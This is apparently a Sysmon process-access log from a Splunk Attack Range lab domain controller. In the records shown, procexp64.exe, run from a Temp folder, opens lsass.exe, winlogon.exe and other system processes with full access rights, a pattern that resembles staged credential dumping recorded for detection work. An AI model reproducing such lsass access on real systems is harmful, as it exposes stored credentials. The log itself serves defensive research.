15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789072Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789071Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789070Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789069Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789068Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789067Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789066Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789065Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789064Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789063Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789062Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789061Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789060Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789059Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789058Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789057Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789056Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789055Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789054Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789053Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789052Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789051Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789050Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789049Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789048Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 